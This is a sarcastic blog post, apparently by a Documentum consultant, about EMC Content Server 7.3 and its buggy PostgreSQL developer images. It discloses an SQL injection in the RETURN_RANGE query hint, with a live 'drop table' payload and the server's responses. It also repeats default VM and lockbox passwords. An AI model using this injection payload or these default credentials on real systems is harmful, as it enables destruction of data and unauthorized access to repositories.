100000 hours of engineering work

This blogppost looks foolish because I does not contain any useful information, however I was unable to miss a gem described below.

All we know that talented team have wasted more than 100000 hours of engineering work to create PostgreSQL build and finally it seems they have found a first customer who decided to install this marvel: DATEDIFF return wrong value in Content Server 7.3 + PostgreSQL 🙂

Poor documentation or backdoor?

Four months ago I disclosed a vulnerability in Documentum 7.3/PostgreSQL, which allows attacker to execute arbitrary SQL statements, interesting thing here is vulnerability description is bit wrong, i.e. prerequisite “return_top_results_row_based config option is set to false” is not required:

Connected to Documentum Server running Release 7.3.0010.0013  Linux64.Postgres
Session id is s0
API> ?,c,select count(*) from dm_user ENABLE (RETURN_RANGE 1 10 '1;drop table dm_user_s;')
       "The ORDER BY position number 1;drop table dm_user_s;  
       is out of range of the number of items in the select list."

API> ?,c,select count(*) from dm_user ENABLE (OBJECT_BASED,RETURN_RANGE 1 10 '1;drop table dm_user_s;')
       "A database error has occurred during the creation of a cursor 
       (' STATE=2BP01, CODE=7, MSG=ERROR: cannot drop table dm_user_s 
       because other objects depend on it; Error while executing the query')."

What is OBJECT_BASED hint?

EMC have shared CS 7.3

Have no idea what does mean IA acronym (internet access, internal affairs?) however:

  • AIX/Oracle got resurrected – seems that money triumph over evilstupidity
  • JMS is now on wildfly 9.0.1
  • bundled JVM version is 1.8.0_66
  • Linux/PostgreSQL is corrupted – try _old directory
  • composer.jar from Linux/Oracle is corrupted, borrow it from Linux/PostgreSQL
  • docker images seem to be corrupted too:
    docker load < centpgrccs 
    6941bfcbbfca: Loading layer [==================================================>] 1.024 kB/1.024 kB
    41459f052977: Loading layer [==================================================>] 224.7 MB/224.7 MB
    open /var/lib/docker/tmp/docker-import-813028725/dd1a6e7bc38e7d74bc5bb7be41e1d1d4f8d17d04cacef4cf93e3cc1ed16ce39e/json: no such file or directory
    [root@rhel72docker01 ~]# docker load < centpgseamlesscs 
    open /var/lib/docker/tmp/docker-import-785439904/be8abba669364a4895c80b2e4c06d8b391faffc54a190abc6aa91ed13d423140/json: no such file or directory
  • UPD

    By tradition I forgot to read installation guide before performing installation (actually it would be just a waste of time), in order to install Linux/PostgreSQL you need following:

    • PostgreSQL database
    • /etc/odbcinst.ini
    • /etc/odbc.ini
    • connection_string environment variable pointing to ODBC’s name
    • POSTGRESQL_HOME environment variable pointing to installation directory of PostgreSQL client libraries (for example, if psql is located in /usr/bin/psql POSTGRESQL_HOME should be /usr)
    • remove $DM_HOME/bin/liblber-2.4.so.2


    CS distribution media contains special java utility (MigrationUtil, sources are available) which allows to change hostname, installation owner and even docbase identifier and name of already installed repository, it seems that EMC considers idea about distributing CS as ready to run docker image seriously.


    MigrationUtil mentioned previously have turn out to be a piece of dog crap – you may use it only if you want to corrupt your database.


    Have no idea how is it possible to do docker without understanding it’s basic concepts – docker images are tar archives, not zip:

    Developer “PostgreSQL” edition fun

    18 months ago EMC released an extremely buggy version of Documentum Content Server intended for development purposes, some of ECN members perfectly described the situation with it:

    and EMC’s reaction for such critics was extremely eloquent (I do believe that nobody likes critics, but ignoring real problems perfectly describes your respectfulness to the customers):

    Three weeks ago new version of Developer Edition got appeared on EMC’s ftp server:

    What we should expect from new version?

    • Networking issues are still not resolved (it is weird because I already mentioned a good receipt for that – it also must be accomplished by following shell scenario:
      cd /etc/udev/rules.d
      rm -f 70-persistent-net.rules
      rm -f 75-persistent-net-generator.rules
      echo "# " > 75-persistent-net-generator.rules


    • EMC decided to use weird lockbox feature, quote from readme file:

      4. Run dm_crypto_create and dm_crypto_boot utilities to enable Lockbox.
      4.1 Execute dm_crypto_create utility as below:
      dm_crypto_create -lockbox lockbox.lb -lockboxpassphrase Password@123 -keyname
      aek.key -passphrase Password@123 -check

      4.2 Run dm_crypto_boot utility as below:
      dm_crypto_boot -all
      Provide the key store passphrase as “Password@123” when prompted.

      , i.e. now you will need to run

      dm_crypto_boot -all -lockbox lockbox.lb \
       -lockboxpassphrase Password@123 -passphrase Password@123

      upon every reboot

    • xPlore still does not work:
    • there is still no reliable installer
    • and the real gem is EMC disclosed their regression tests (check /opt/Suites directory) – now you can get a real progress on developer edition 🙂

    PostgreSQL DEV image available

    ftp://ftp2.lss.emc.com/Hotfixes/postgress/Image-Postgres/ (credential could be found in CS6.7SP1/7.0 patch notes, google is also your friend).

    This VM image has a Postgres Database, Documentum Content Server, Postgres based pre-configured repository (MyRepo),
    DA and REStful services deployed on apache-tomcat server.
    Steps to use the VM player for running the VM image
    1. Extract the CentOSPostgres18Feb.rar file using WinRAR.
    This rar file contains:
    -Documentum Reference Guides: Refernce guides related to documentum
    2. Download and install the VMware player 6.0.1 or any other VM Player which supports ovf format. 
    3. Once the VMware player is running , launch the VM by selecting the *.ovf file.
    4. If the host CPU is Intel 64 bit ,you may encounter an error regarding Intel VT-x being disabled on the machine;
       reboot the machine and goto BIOS setting-> under CPU settings, enable Intel Virtualization preference.
    5. Once the VM Image is up and running login with dmadmin/password credential.
    6. Once you login in to the VM, refer readme in $HOME directory.
    7 . root user password for VM image is password.


    the download address has been changed, new address is ftp://ftp2.lss.emc.com/dev_out/Image-Postgres/